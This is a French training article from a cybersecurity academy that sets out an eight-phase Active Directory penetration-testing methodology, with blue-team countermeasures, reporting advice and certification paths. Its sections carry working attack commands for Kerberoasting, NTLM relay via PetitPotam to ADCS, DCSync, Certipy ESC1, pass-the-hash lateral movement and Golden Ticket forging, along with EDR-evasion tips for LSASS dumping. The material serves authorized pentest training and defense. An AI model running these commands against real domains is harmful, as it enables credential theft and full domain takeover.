Zeroday Cyber Academy

Pentest

Méthodologie pentest Active Directory : guide 2026

Méthodologie complète pentest Active Directory 2026 : recon BloodHound, exploitation Kerberos et ADCS, lateral movement, outils NetExec et contre-mesures Blue Team.

Naim Aouaichia
18 min de lecture
  • Pentest
  • Active Directory
  • BloodHound
  • Kerberos
  • ADCS
  • NTLM relay
  • Lateral movement
  • Red Team
  • Méthodologie
  • MITRE ATT&CK

La méthodologie de pentest Active Directory (AD) en 2026 suit 8 phases mappées sur MITRE ATT&CK Enterprise : reconnaissance externe, initial access, AD enumeration, credential access, privilege escalation (incluant ADCS), lateral movement, persistence, et reporting. L'AD reste le cœur névralgique des infrastructures d'entreprise (plus de 90 % des grands groupes français en dépendent selon CESIN 2024) et concentre 60 à 80 % de la valeur technique des engagements pentest interne et red team. Les vecteurs d'escalade dominants 2026 sont Kerberoasting sur comptes de service, ADCS misconfigurations ESC1 à ESC13, NTLM relay via coercition (PetitPotam, PrinterBug, DFSCoerce), ACL abuse identifié via BloodHound, et delegation abuse. Cet article détaille chaque phase avec outils de référence (BloodHound CE v5+, Impacket, NetExec, Certipy, Rubeus), techniques mappées ATT&CK, CVE clés (Zerologon CVE-2020-1472, noPac CVE-2021-42287), et contre-mesures blue team. Sources : papier Certified Pre-Owned SpecterOps 2021, blog ADSecurity.org (Sean Metcalf), HarmJ0y (Will Schroeder), Hackndo, et Exploit Notes. Article destiné à un pentester post-OSCP visant CRTP, CRTE ou OSEP.

1. Vue d'ensemble de la méthodologie AD en 8 phases

Le pentest AD n'est pas un enchaînement linéaire mais un cycle itératif : chaque credential obtenu relance la phase d'énumération, chaque privilège gagné ouvre de nouvelles surfaces. La méthodologie structurante mappe les phases sur MITRE ATT&CK Enterprise v15 (2024).

PhaseObjectifTactique ATT&CK principale
1. Reconnaissance externeSurface attaque, users, servicesTA0043 Reconnaissance
2. Initial accessPremier credential ou sessionTA0001 Initial Access
3. AD enumerationCarte complète du domaineTA0007 Discovery
4. Credential accessExtraire hashes, tickets, plaintextTA0006 Credential Access
5. Privilege escalationUser → Admin local → Domain AdminTA0004 Privilege Escalation
6. Lateral movementÉtendre le contrôle sur les hôtesTA0008 Lateral Movement
7. PersistenceMaintenir l'accès en cas de rotationTA0003 Persistence
8. ReportingLivrable client structuréHors ATT&CK

Philosophie opérationnelle

  • Assume breach : démarrer l'interne avec hypothèse d'un utilisateur standard compromis. Simule un phishing réussi ou une fuite de credential.
  • Moindre bruit : en red team, toute action déclenche potentiellement une alerte. Prioriser les techniques passives (LDAP queries, Kerberos pre-auth) avant les actives (NTLM relay, Mimikatz).
  • OPSEC rigoureux : logger les commandes côté opérateur pour traçabilité post-engagement, jamais d'actions non documentées.
  • Reset contrôlé : après chaque pivot ou action intrusive, vérifier que le blue team n'a pas détecté (ou si détection souhaitée en purple team).

2. Phase 1 — Reconnaissance externe

Hors périmètre AD direct mais conditionne l'initial access si l'engagement démarre outside-in.

OSINT ciblé corporate

  • LinkedIn : patterns d'emails (prenom.nom@corp.fr), structure d'équipes, technologies revendiquées.
  • Hunter.io, snov.io, phonebook.cz : emails publics associés au domaine.
  • GitHub, GitLab public : secrets oubliés, repos dev mentionnant l'infrastructure AD.
  • crt.sh, certificate transparency : sous-domaines via certificats (owa, adfs, mail, webmail, sharepoint, vpn, rdweb).
  • Shodan, Censys : services exposés (OWA, Exchange, ADFS, Citrix, VPN, RDP/RDWeb).
  • dehashed.com, haveibeenpwned : credential leaks historiques.

Énumération services AD exposés

  • ADFS (Active Directory Federation Services) : pages /adfs/ls/idpinitiatedsignon fréquemment laissées exposées, permettent password spraying sur le domaine.
  • OWA / ECP : Exchange Web Access, cible classique de spraying (attention verrouillage).
  • RDWeb / RD Gateway : Remote Desktop Web Access, cible de spraying et de CVE historiques.
  • Autodiscover Exchange : leak d'infos de domaine via réponses XML.
  • Azure AD / M365 : onedrive.com/oid=..., teams.microsoft.com, énumération via GetUserRealm.

Outils

  • o365spray, MSOLSpray, CredMaster pour password spraying contrôlé.
  • Kerbrute pour validation d'usernames via Kerberos pre-authentication.
  • AADInternals (PowerShell, Dr. Nestori Syynimaa) pour Azure AD enumeration.

3. Phase 2 — Initial access interne

Transition du hors périmètre vers un pied dans le domaine. Trois scénarios classiques.

3.1 Poste utilisateur compromis (phishing, malware)

  • Typique en red team et assume breach.
  • Point de départ : session user avec shell (CMD, PowerShell, C2 implant).

3.2 Accès physique ou réseau interne (pentest assume breach)

  • Scénario classique : branchement sur LAN via port Ethernet disponible.
  • Vérifier 802.1X NAC : MAC spoofing possible sur imprimantes MAB, bypass via Silentbridge en cas de 802.1X strict.

3.3 Service exposé exploité (pentest full-chain)

  • Exploitation directe d'un service avec CVE (EternalBlue MS17-010, PrintNightmare CVE-2021-34527, SMBGhost).
  • Relay externe vers interne (NTLMRelay sur service outbound, complexe).

LLMNR / NBT-NS poisoning en réseau interne

En LAN, exploitation des protocoles de résolution broadcast pour capture de NTLMv1/v2 hashes.

  • Responder : outil canonique, écoute LLMNR, NBT-NS, mDNS et capture les hashes quand les clients tentent de résoudre un nom hors DNS.
  • Inveigh : équivalent PowerShell, utile dans un contexte où Responder Python n'est pas déployable.

Les hashes NTLMv2 capturés peuvent ensuite être crackés offline (hashcat mode 5600) ou relayés en live (voir Phase 4).

4. Phase 3 — Reconnaissance Active Directory

Une fois dans le domaine avec un credential basique ou une session, cartographier exhaustivement l'environnement est la priorité absolue.

BloodHound Community Edition (CE) v5+

L'outil dominant de cartographie des chemins d'attaque AD depuis 2016, entièrement réécrit en 2023-2024 (Community Edition v5+ avec nouvelle stack PostgreSQL/Neo4j et UI web). Utilisé par tous les pentesters AD 2026.

  • Collecteurs : SharpHound.exe (Windows, le plus complet), bloodhound-python (alternative Linux), rustyhound (reimplémentation Rust en cours 2024).
  • Ingestion : JSON zip uploadé dans BloodHound CE.
  • Queries clés : Shortest Path to Domain Admins, Find AS-REP Roastable Users, Find Kerberoastable Users, Find Principals with DCSync Rights, ACL abuse paths.
# Collection SharpHound depuis un poste user standard
.\SharpHound.exe -c All,GPOLocalGroup --zipfilename bh_snapshot.zip `
  --collectallproperties --searchforest --randomizefilenames
 
# Variante stealth avec méthodes réduites
.\SharpHound.exe -c DCOnly,Session --stealth

PowerView et ActiveDirectory PowerShell module

  • PowerView (module PowerSploit) : Get-DomainUser, Get-DomainComputer, Get-DomainGroupMember, Get-DomainGPO, Find-DomainShare. Indispensable pour queries ciblées et live reconnaissance.
  • RSAT ActiveDirectory module : Get-ADUser, Get-ADComputer en PowerShell natif Microsoft (moins suspect que PowerView sur un DC).

NetExec (ex CrackMapExec)

Fork de CrackMapExec lancé en 2023 après abandon du projet original, devenu la référence opérationnelle 2026 pour les opérations de masse AD sur SMB, LDAP, WinRM, MSSQL, RDP.

# Enumeration LDAP depuis Kali avec un user standard
nxc ldap <dc_ip> -u alice -p 'P@ssw0rd' --users
nxc ldap <dc_ip> -u alice -p 'P@ssw0rd' --asreproast asrep_output.txt
nxc ldap <dc_ip> -u alice -p 'P@ssw0rd' --kerberoasting kerb_output.txt
nxc ldap <dc_ip> -u alice -p 'P@ssw0rd' --gmsa  # Group Managed Service Accounts
 
# Vérification accès SMB et ACL
nxc smb <subnet>/24 -u alice -p 'P@ssw0rd' --shares

ADRecon et PingCastle

  • ADRecon : script PowerShell produisant un rapport Excel complet de la posture AD.
  • PingCastle : outil défensif mais utilisable en offensive pour identifier rapidement les misconfigurations les plus exploitables (AD delegation, trusts, ADCS).

5. Phase 4 — Credential access

Objectif : obtenir des credentials supplémentaires par extraction, capture ou crack.

5.1 Kerberoasting (T1558.003)

Exploite les Service Principal Names (SPN) attachés aux comptes de service. Tout utilisateur authentifié peut demander un TGS (Ticket Granting Service) chiffré avec le hash NTLM du compte de service, puis le cracker offline.

# Avec Impacket
GetUserSPNs.py -request -dc-ip <dc_ip> corp.local/alice:P@ssw0rd -outputfile spns.txt
 
# Crack offline avec hashcat
hashcat -m 13100 spns.txt rockyou.txt --force

Contre-mesure blue team : group Managed Service Accounts (gMSA), mots de passe longs (25+ caractères) sur service accounts, monitoring des TGS requests avec chiffrement RC4 (mode 23, classique du kerberoasting alors que AES est standard depuis Server 2008R2).

5.2 AS-REP Roasting (T1558.004)

Exploite les comptes utilisateurs avec l'attribut DONT_REQ_PREAUTH activé. Tout utilisateur non authentifié peut demander un AS-REP chiffré, crackable offline.

# Avec Impacket, sans credential
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip <dc_ip>
 
# Crack offline
hashcat -m 18200 asrep.txt rockyou.txt

5.3 NTLM relay via coercition

Pattern dominant 2021-2026 pour escalade AD. Force un compte machine privilégié (DC, MS-SQL server) à authentifier vers un attaquant, qui relay vers un service cible.

Coerciteurs connus

  • PetitPotam (CVE-2021-36942, patchable) : MS-EFSRPC EfsRpcOpenFileRaw.
  • PrinterBug : MS-RPRN RpcRemoteFindFirstPrinterChangeNotificationEx.
  • DFSCoerce (2022, Filip Dragović) : MS-DFSNM.
  • Coerced Potato, ShadowCoerce : variantes.

Pattern classique : PetitPotam + relay vers AD CS ESC8

# Shell 1 : ntlmrelayx écoute et relay vers le web enrollment AD CS
impacket-ntlmrelayx -t http://<adcs_host>/certsrv/certfnsh.asp \
  -smb2support --adcs --template 'DomainController'
 
# Shell 2 : coercition du DC pour forcer son compte machine à authentifier
python3 PetitPotam.py <attacker_ip> <dc_ip>
 
# Résultat : certificat émis pour le compte DC$, exploitable pour DCSync

5.4 LSASS dump et Mimikatz

Extraction des credentials en mémoire via LSASS. Déclenche quasi-systématiquement l'EDR en 2026.

  • Mimikatz : référence historique, directement détecté.
  • ProcDump.exe puis analyse offline avec pypykatz : meilleur OPSEC.
  • MiniDumpWriteDump via syscall direct : méthode moderne evasion EDR.
  • NanoDump (Fortra) : dump minimal de LSASS optimisé pour red team.

5.5 DCSync (T1003.006)

Réplication de la base AD pour extraire les hashes NTLM de tous les comptes, y compris krbtgt. Nécessite les droits GetChanges et GetChangesAll sur la partition domain, historiquement réservés aux DC et à Domain Admins. Vérifier via BloodHound query "Find Principals with DCSync Rights".

# Impacket secretsdump avec compte ayant DCSync rights
secretsdump.py -just-dc corp.local/admin:P@ssw0rd@<dc_ip>
 
# Version mimikatz
lsadump::dcsync /domain:corp.local /user:krbtgt

6. Phase 5 — Privilege escalation (incluant ADCS)

6.1 Local privilege escalation

Sur un poste user, exploitation classique Windows avant de pivoter AD.

  • winPEAS (ou PEASS-ng) pour énumération automatique.
  • SeImpersonatePrivilege : exploitable via Juicy Potato, PrintSpoofer, GodPotato (2023), EfsPotato.
  • Services mal configurés : unquoted service path, modifiable service binary.
  • Tokens : impersonation token d'utilisateurs plus privilégiés.

6.2 Domain privilege escalation via ACL

Identifiées par BloodHound comme chemins d'attaque. Les ACE (Access Control Entries) dangereuses sur objets AD :

  • GenericAll, GenericWrite, WriteOwner, WriteDACL : contrôle total sur un objet.
  • ForceChangePassword : reset de mot de passe sans connaître l'ancien.
  • AddMember : ajouter soi-même à un groupe privilégié.
  • AllExtendedRights : inclut GetChanges, DCSync.

6.3 Unconstrained delegation

Machines avec TrustedForDelegation: True. Quand un utilisateur authentifie sur cette machine, son TGT y est stocké en mémoire. Compromission machine = TGT de tous les users connectés.

Exploitation : forcer un DC à authentifier vers la machine unconstrained via PrinterBug ou PetitPotam, capturer le TGT du compte DC$.

6.4 RBCD (Resource-Based Constrained Delegation)

Si contrôle sur l'attribut msDS-AllowedToActOnBehalfOfOtherIdentity d'une machine cible, possibilité d'impersonner n'importe quel utilisateur sur cette machine.

# Pattern RBCD
impacket-rbcd -delegate-from fakecomputer$ -delegate-to target$ \
  -action write corp.local/alice:P@ssw0rd
 
impacket-getST -spn cifs/target.corp.local -impersonate Administrator \
  corp.local/fakecomputer\$:Fake123 -dc-ip <dc_ip>

6.5 ADCS exploitation (ESC1 à ESC13)

Le domaine d'attaque AD le plus productif depuis 2021 (Certified Pre-Owned paper SpecterOps). Outil dominant : Certipy (Olivier Lyak, Python).

ESCVulnérabilitéExploitation
ESC1Template permet SAN arbitrairecertipy req -template VulnTemplate -upn administrator@corp.local
ESC2Template Any Purpose / SubCAÉmission cert à authentification générique
ESC3Template Enrollment Agent misuseÉmission cert au nom d'un autre user
ESC4ACL misconfigurée sur templateModifier template puis ESC1
ESC6EDITF_ATTRIBUTESUBJECTALTNAME2 flagSAN arbitraire forcé globalement
ESC8NTLM relay vers /certsrvVia PetitPotam → cert DC
ESC9 / ESC10No security extension / weak mappingPost KB5014754 partial mitigation
ESC11NTLM relay vers ICPRVia PetitPotam → cert privilégié
ESC13OID group link abuse (2024)Groupe mappé via policy OID
# Énumération complète Certipy
certipy find -u alice -p 'P@ssw0rd' -dc-ip <dc_ip> -vulnerable -stdout
 
# Exploitation ESC1 typique
certipy req -u alice -p 'P@ssw0rd' -target <ca_server> \
  -ca 'CORP-CA' -template 'VulnTemplate' -upn administrator@corp.local
 
# Authentification avec le certificat obtenu
certipy auth -pfx administrator.pfx -dc-ip <dc_ip>
# Résultat : hash NTLM de Administrator + TGT

Contre-mesures blue team : KB5014754 (mai 2022) et suivants, strong certificate mapping activé, audit des templates, restriction NTLM sur endpoints CA web enrollment, retrait du flag EDITF_ATTRIBUTESUBJECTALTNAME2.

7. Phase 6 — Lateral movement

Une fois un credential valide obtenu (hash NTLM, TGT Kerberos, plaintext), propagation latérale sur les hôtes du domaine.

Techniques classiques mappées ATT&CK

  • T1021.002 SMB/Windows Admin Shares : PsExec, SMBExec, WMIExec.
  • T1021.006 Windows Remote Management : WinRM via Evil-WinRM ou PowerShell Remoting.
  • T1021.001 RDP : xfreerdp, restricted admin mode pour Pass-the-Hash.
  • T1047 WMI : wmic, Impacket wmiexec.
  • T1570 Lateral Tool Transfer : SMB copy, FTP, cobalt strike smb_copy.

Impacket suite (indispensable)

# Pass-the-Hash via psexec-like
psexec.py corp.local/admin@<target> -hashes :<NT_HASH>
 
# WMI exec (plus discret, pas de service installation)
wmiexec.py corp.local/admin@<target> -hashes :<NT_HASH>
 
# SMB exec
smbexec.py corp.local/admin@<target> -hashes :<NT_HASH>
 
# WinRM avec Evil-WinRM
evil-winrm -i <target> -u admin -H <NT_HASH>

NetExec en masse

# Spraying d'un hash sur un subnet pour identifier les machines où admin local
nxc smb <subnet>/24 -u admin -H <NT_HASH> --local-auth
 
# Dump de SAM sur toutes les machines accessibles
nxc smb <subnet>/24 -u admin -H <NT_HASH> --sam

Pass-the-Ticket (Kerberos)

Utilisation de TGT ou TGS volés pour authentifier sans connaître le password.

# Générer ticket depuis hash NTLM (Overpass-the-Hash)
impacket-getTGT corp.local/alice -hashes :<NT_HASH>
export KRB5CCNAME=alice.ccache
 
# Utiliser le TGT pour lateral movement
psexec.py -k -no-pass <target>.corp.local

8. Phase 7 — Persistence et post-exploitation

Domain Admin obtenu, objectif : maintenir l'accès en cas de rotation ou de détection partielle.

Golden Ticket (T1558.001)

TGT forgé avec le hash krbtgt (obtenu via DCSync). Donne accès à tout service du domaine, valable par défaut 10 ans. Détecté par audit des événements Kerberos anormaux.

# Forge avec Impacket
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <domain_sid> \
  -domain corp.local Administrator
 
export KRB5CCNAME=Administrator.ccache

Silver Ticket (T1558.002)

TGS forgé avec le hash NTLM d'un compte de service. Limité à un service spécifique mais plus discret (pas de requête au DC).

AdminSDHolder backdoor

Modification de l'ACL sur l'objet AdminSDHolder pour accorder un user standard des droits sur les comptes protégés. Toutes les heures, SDProp réapplique ces ACL sur Domain Admins, Account Operators etc. Persistence très furtive.

SID History abuse

Injection de SID de groupes privilégiés dans le SID History d'un compte peu surveillé.

DCShadow

Crée un faux DC temporaire pour répliquer des modifications sans passer par le DC legitimate. Extrêmement furtif, détection uniquement via audit Kerberos ciblé.

9. Phase 8 — Reporting et livrable

Souvent négligée, la qualité du rapport est ce qui différencie un pentester confirmé d'un senior. 60-80 % de la valeur perçue par le client vient du rapport.

Structure de rapport AD standard

  1. Executive summary (2-3 pages) : contexte, périmètre, résultat global, impact business traduit pour COMEX.
  2. Méthodologie : phases, outils, durée, assumptions (assume breach ou non).
  3. Synthèse des vulnérabilités : tableau avec criticité CVSS, CWE, recommandation prioritaire.
  4. Détails des findings : pour chaque vulnérabilité, description, preuves (captures horodatées), étapes de reproduction, impact, recommandation.
  5. Kill chain narrative : récit chronologique de l'attaque full-path de initial access à Domain Admin.
  6. Carte d'attaque BloodHound : export du chemin critique annoté.
  7. Recommandations priorisées : quick wins (moins d'une semaine), medium-term (1-3 mois), strategic (6-12 mois).
  8. Annexes techniques : logs outils, commandes, artefacts.

Éléments différenciants d'un bon rapport

  • Mapping MITRE ATT&CK systématique par finding.
  • Recommandations chiffrées (volume d'users affectés, coût estimé de remédiation).
  • Captures d'écran horodatées de chaque exploitation, pas de screenshots laboratoire.
  • Re-test plan inclus : comment valider le patch côté client.

10. Outils de référence et labs d'entraînement

10.1 Stack d'outils opérationnelle 2026

CatégorieOutil leaderUsage
Cartographie ADBloodHound CE v5+, SharpHound, bloodhound-pythonGraphe chemins d'attaque
Énumération et exécutionNetExec (ex CrackMapExec)Opérations de masse SMB/LDAP/WinRM
Suite Python offensiveImpacketsecretsdump, psexec, wmiexec, getTGT
Kerberos abuseRubeus, Impacket, KerbruteAS-REP, TGS, S4U
ADCS exploitationCertipyESC1-ESC13 automation
NTLM relayntlmrelayx (Impacket)PetitPotam, PrinterBug relay
LSASS dump stealthNanoDump, MiniDumpWriteDump syscallExtraction LSASS evasion EDR
PowerView / AD modulePowerSploit, RSAT PowerShellQueries LDAP live
Passwords crackinghashcat, John the RipperOffline crack NTLM, Kerberoast
CoerciteursPetitPotam, PrinterBug, DFSCoerceForce authentification machine
C2 moderneHavoc, Sliver, Mythic, Cobalt StrikeCommand and Control stealth

10.2 Labs pour s'entraîner

  • HackTheBox Pro Labs (Offshore, RastaLabs, CyberNetics, APTLabs, Zephyr) : environnements AD multi-machine réalistes, payants mais référence.
  • Offshore spécifiquement est considéré comme le lab AD de référence.
  • GOAD (Game of Active Directory) de Mayfly : lab AD vulnérable auto-hébergeable, gratuit, excellent pour s'entraîner chez soi.
  • TryHackMe AD paths : série de rooms AD progressives.
  • Altered Security CRTP / CRTE labs : labs intégrés aux certifications, très réalistes.
  • Hack The Box Academy, AD Enumeration and Attacks path : parcours modulaire.

10.3 Certifications et parcours recommandé

CertificationCoûtNiveauROI marché France
OSCP≈ 1 600 $Junior ADTicket d'entrée obligatoire
CRTP (Altered Security)≈ 249 $AD focus hands-onExcellent, très valorisé
CRTE (Altered Security)≈ 349 $AD enterprise multi-domaineTrès fort, rare et différenciant
PNPT (TCM Security)≈ 399 $AD réseau interneBon, moins reconnu en France
OSEP (OffSec)≈ 1 800 $Red team + AD avancéObligatoire pour red team
SANS SEC565≈ 8-9 k€Red team ops completTrès fort en banque / OIV

Ordre optimal d'apprentissage 2026 : OSCP → CRTP → CRTE → OSEP. Budget total sans SANS : environ 4 000 € sur 18-24 mois. Excellent ROI salarial (voir Salaire red teamer pour les grilles par certification).

11. Ressources de référence permanente

  • ADSecurity.org (Sean Metcalf) : blog de référence mondiale sur Active Directory sécurité, 2012-2026.
  • SpecterOps blog (Will Schroeder HarmJ0y, Lee Chagolla-Christensen, Elad Shamir) : recherche avancée AD et ADCS, notamment papier Certified Pre-Owned.
  • Hackndo.com (Pixis) : blog francophone de référence sur Kerberos, relay, PKI.
  • ired.team : notes de lab très détaillées sur toutes les techniques AD.
  • Exploit Notes : cheatsheets par technique.
  • BloodHound-Owned (github, CompassSecurity) : queries Cypher avancées.
  • TheHackerRecipes.com : compendium très complet des techniques AD.

12. Contre-mesures blue team à connaître

Un pentester AD compétent comprend les défenses pour mieux les contourner et pour rédiger des recommandations pertinentes.

Détections et durcissement AD

  • Tier model Microsoft (ESAE legacy → Enterprise Access Model 2021) : segmentation Tier 0 / Tier 1 / Tier 2.
  • LAPS (Local Administrator Password Solution) ou Windows LAPS (2023) : rotation automatique des mots de passe admin locaux.
  • PAM (Privileged Access Management) : CyberArk, Delinea, Microsoft PAM.
  • Protected Users group : membre = no NTLM, no cached creds, no Kerberos delegation, AES only.
  • Credential Guard, LSA protection : protection mémoire LSASS.
  • Audit policy et SACL : logon events, Kerberos events, DCSync detection.
  • Microsoft Defender for Identity (ex Azure ATP) : détection anomalie comportementale AD.
  • SentinelOne, CrowdStrike, Elastic Security : EDR avec détection Mimikatz, Cobalt Strike, Impacket.

Mitigations ADCS

  • KB5014754 (mai 2022) et updates successives.
  • Strong certificate mapping enforced.
  • Retrait flag EDITF_ATTRIBUTESUBJECTALTNAME2.
  • NTLM bloqué sur endpoints /certsrv et ICPR.

Points clés à retenir

  • Méthodologie en 8 phases mappée MITRE ATT&CK : recon externe, initial access, AD enum, credential access, privesc, lateral movement, persistence, reporting.
  • Vecteurs dominants 2026 : Kerberoasting, ADCS ESC1-ESC13, NTLM relay via PetitPotam/PrinterBug, ACL abuse BloodHound, delegation abuse.
  • Stack d'outils incontournable : BloodHound CE v5+, Impacket, NetExec (ex CrackMapExec), Certipy, Rubeus, Mimikatz ou alternatives modernes.
  • OPSEC strict : password spraying throttlé, LSASS dump via syscall, persistence intégralement documentée et revertible.
  • Labs : HackTheBox Pro Labs (Offshore), GOAD Mayfly (gratuit), CRTP/CRTE Altered Security.
  • Certifications ROI : OSCP (ticket d'entrée), CRTP et CRTE Altered Security (excellents ROI AD), OSEP (red team avancé).
  • Reporting : 60-80 % de la valeur perçue vient du rapport, structurer avec kill chain narrative et mapping ATT&CK systématique.

Pour aller plus loin

Questions fréquentes

  • Quelle est la différence entre pentest AD interne et externe ?
    Deux phases distinctes qui forment un engagement AD complet. Le pentest externe démarre sans accès au domaine : focus sur OSINT (LinkedIn, emails), enumeration des services exposés (OWA, ADFS, VPN, RDWeb), password spraying contrôlé, phishing avec payload. L'objectif est l'obtention d'un premier credential ou d'une session valide sur un endpoint interne. Le pentest interne démarre typiquement avec un poste utilisateur standard ou un accès LAN, l'attaquant est déjà dans le périmètre mais sans privilège. 95 pourcent de la valeur technique du pentest AD est en phase interne : BloodHound, Kerberoasting, ADCS ESC, lateral movement, escalade vers Domain Admin. Les engagements red team incluent toujours les deux phases ; les audits AD classiques se concentrent souvent sur l'interne avec hypothèse d'assume breach.
  • BloodHound ou PowerView : lequel utiliser en 2026 ?
    Les deux, pour des usages complémentaires. BloodHound Community Edition (v5+, réécriture 2023-2024) est l'outil de visualisation et d'analyse de chemins d'attaque AD, consommant des données collectées par SharpHound (Windows) ou BloodHound.py (Linux, rustyhound alternative). PowerView (module PowerSploit) reste pertinent pour des requêtes LDAP précises en live, scripting de reconnaissance ciblée, et vérification rapide sans drop complet de données. Pattern recommandé : SharpHound ou bloodhound.py pour le graphe complet, PowerView pour les queries spot et les vérifications en post-exploitation. NetExec (fork CrackMapExec depuis 2023) consolide beaucoup de requêtes LDAP et SMB en une seule interface et remplace progressivement PowerView pour les opérations de masse.
  • Quels sont les vecteurs d'escalade vers Domain Admin les plus courants en 2026 ?
    Cinq vecteurs dominent les rapports de pentest France 2024-2026 dans l'ordre de fréquence. 1) Kerberoasting sur service accounts avec mots de passe faibles (TGS-REP crackable offline). 2) ADCS misconfigurations ESC1 à ESC11 (papier Certified Pre-Owned de SpecterOps 2021, toujours d'actualité). 3) NTLM relay via coercition (PetitPotam CVE-2021-36942, PrinterBug MS-RPRN, DFSCoerce 2022) vers LDAP, LDAPS ou AD CS. 4) ACL abuse identifié via BloodHound (GenericAll, WriteDACL, WriteOwner sur objets privilégiés). 5) Unconstrained delegation et RBCD (Resource-Based Constrained Delegation) abuse. Zerologon (CVE-2020-1472) et noPac (CVE-2021-42287 plus 42278) ne devraient plus être exploitables sur un domaine patché 2022+ mais se rencontrent encore sur des environnements mal mis à jour.
  • Faut-il utiliser Mimikatz ou des alternatives en 2026 ?
    Mimikatz reste la référence conceptuelle mais est systématiquement détecté par tout EDR moderne (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne, Elastic Security). En opération réelle rouge-team 2026, utiliser directement mimikatz.exe sur disque déclenche l'alerte en moins de 30 secondes. Alternatives opérationnelles : Rubeus (C# moderne pour Kerberos abuse), SharpKatz et SharpMapExec (réimplémentations partielles en C# loadable via execute-assembly depuis un C2), Impacket (Python côté attaquant, jamais dropped sur la cible), MiniDumpWriteDump via API unhooking pour dump LSASS. Pour les missions pentest à scope clair avec EDR hors scope ou désactivé, Mimikatz reste utilisable. Pour red team sous contrainte d'evasion, obligatoire d'utiliser des alternatives in-memory.
  • Comment attaquer ADCS et qu'est-ce que les ESC ?
    ADCS (Active Directory Certificate Services) est le composant PKI d'AD, largement déployé et historiquement sous-sécurisé. Le papier Certified Pre-Owned publié par Will Schroeder et Lee Chagolla-Christensen SpecterOps en juin 2021 a identifié 8 vecteurs initiaux ESC1 à ESC8, étendus à ESC9, ESC10, ESC11 (Certipy 2022-2024) et ESC13 (2024). Les plus fréquents : ESC1 (template autorisant SAN arbitraire pour authentification), ESC4 (permissions misconfigurées sur template permettant modification), ESC8 (NTLM relay vers AD CS web enrollment, exploité via PetitPotam). Outil principal : Certipy (Python, Olivier Lyak) qui automatise l'énumération et l'exploitation complète de chaque ESC. Microsoft a publié KB5014754 en mai 2022 et des updates successives 2022-2024 pour forcer strong mapping ; environnements non patchés restent massivement vulnérables.
  • Quelle certification passer pour prouver la maîtrise du pentest AD ?
    Ordre recommandé 2026 par ROI et niveau. 1) OSCP OffSec Certified Professional (environ 1 600 dollars) : couvre AD basique dans sa v2024, passage marché obligatoire. 2) CRTP Certified Red Team Professional Altered Security (environ 249 dollars) : spécialisation AD hands-on, labs très bien conçus, excellent ROI. 3) CRTE Certified Red Team Expert Altered Security (environ 349 dollars) : niveau enterprise AD avec forêt multi-domaine et trusts. 4) OSEP OffSec Experienced Pentester (environ 1 800 dollars) : bascule red team avec AD avancé et evasion EDR. 5) SANS SEC565 Red Team Operations and Adversary Emulation (environ 8-9 k€) : référence enterprise red team avec fort focus AD. Le combo CRTP plus CRTE plus OSEP couvre 90 pourcent des compétences AD pentest demandées en France 2026.
Découvrir le bootcamp DevSecOps

Écrit par

Naim Aouaichia

Expert cybersécurité et fondateur de Zeroday Cyber Academy

Expert cybersécurité avec un master spécialisé et un parcours hybride : développement, DevOps, DevSecOps, SOC, GRC. Fondateur de Hash24Security et Zeroday Cyber Academy. Formateur et créateur de contenu technique sur la cybersécurité appliquée, la sécurité des LLM et le DevSecOps.

À lire également